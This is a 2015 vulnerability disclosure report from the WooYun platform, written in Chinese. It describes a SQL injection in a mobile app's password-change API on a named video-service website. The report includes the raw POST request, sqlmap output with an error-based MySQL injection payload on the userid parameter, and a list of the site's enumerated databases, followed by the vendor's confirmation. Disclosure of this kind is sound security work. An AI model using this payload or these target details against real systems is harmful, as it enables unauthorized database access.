乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-19: 细节已通知厂商并且等待厂商处理中 2015-05-19: 厂商已经确认,细节仅向厂商公开 2015-05-29: 细节向核心白帽子及相关领域专家公开 2015-06-08: 细节向普通白帽子公开 2015-06-18: 细节向实习白帽子公开 2015-07-03: 细节向公众公开
*
光息谷 为云视旗下APP修改密码处存在POST注入抓包
POST /e/extend/new_client_api/psw_modify.php HTTP/1.1Host: www.hktv.tvProxy-Connection: keep-aliveAccept-Encoding: gzipContent-Type: application/x-www-form-urlencoded; charset=utf-8Content-Length: 26Connection: keep-aliveUser-Agent: ?????ˉè°· 2.9 (iPhone; iPhone OS 8.3; zh_CN)userid=1&password=qqqqqq
证明:
f any)? [y/N] nsqlmap identified the following injection points with a total of 58 HTTP(s) requests:---Place: POSTParameter: userid Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: userid=1 AND (SELECT 3863 FROM(SELECT COUNT(*),CONCAT(0x3a6c766c3a,(SELECT (CASE WHEN (3863=3863) THEN 1 ELSE 0 END)),0x3a6178773a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&password=qqqqqq---[17:16:09] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.4.23back-end DBMS: MySQL 5.0[17:16:09] [INFO] fetched data logged to text files under 'D:\Python27\sqlmap\output\www.hktv.tv'[*] shutting down at 17:16:09
数据库:
available databases [24]:[*] bbs_hktv[*] cdp[*] cms_as[*] cms_hktv[*] information_schema[*] jsbc-security[*] meicam[*] mysql[*] odp[*] onairfastedit[*] onairtranscode[*] ors[*] performance_schema[*] security_as[*] security_hktv[*] security_hn[*] vms[*] vms_as[*] vms_hktv[*] vms_jyg[*] vms_sjs[*] wechat_hn[*] wechat_sjs[*] yicloud_aliyun_rds_dummy_database
RT
危害等级:高
漏洞Rank:20
确认时间:2015-05-19 09:50
感谢您的关注,这个问题我们会尽快修复,谢谢。
暂无